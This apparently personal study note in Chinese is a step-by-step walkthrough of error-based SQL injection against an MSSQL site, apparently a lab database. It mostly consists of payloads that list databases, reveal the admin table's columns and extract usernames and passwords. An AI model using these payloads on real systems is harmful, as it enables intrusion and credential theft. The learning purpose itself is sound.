网络安全-Day25-获取mssql网站帐号和密码
1、爆所有数据库名(and db_name() =0--)
![](https://img.haomeiwen.com/i21563505/9494598f15cb0267.png)
2、MsSQL爆表与字段名
2.1、表名称admin,第一个字段名“id”(having 1=1--)
![](https://img.haomeiwen.com/i21563505/1e5fb559d75352b1.png)
2.2、表名称admin,第二个字段名“name”(group by admin.id having 1=1--)
![](https://img.haomeiwen.com/i21563505/2ada91be6a6eb576.png)
2.3、表名称admin,第三个字段名“password”(group by admin.id,admin.name having 1=1--)
![](https://img.haomeiwen.com/i21563505/fb0e6c18f431b6d1.png)
2.4、表名称admin,这次执行后没有报错说明admin表只有id、name、password三个字段(group by admin.id,admin.name,admin.password having 1=1--)
![](https://img.haomeiwen.com/i21563505/dd57cfa995ae8703.png)
3、爆字段内容
3.1、爆用户名称(and (select top 1 name from admin)>0)
![](https://img.haomeiwen.com/i21563505/1b8d1a05a3e8c004.png)
3.2、爆用户名和密码。(/**/and/**/(select/**/top/**/1/**/isnull(cast([id]/**/as/**/nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([name]/**/as/**/nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([password]/**/as/**/nvarchar(4000)),char(32))/**/from/**/[testdb]..[admin]/**/where/**/1=1/**/and/**/id/**/not/**/in/**/(select/**/top/**/0/**/id/**/from/**/[testdb]..[admin]/**/where/**/1=1/**/group/**/by/**/id))>0/**/and/**/1=1)
![](https://img.haomeiwen.com/i21563505/489928106d5b92ea.png)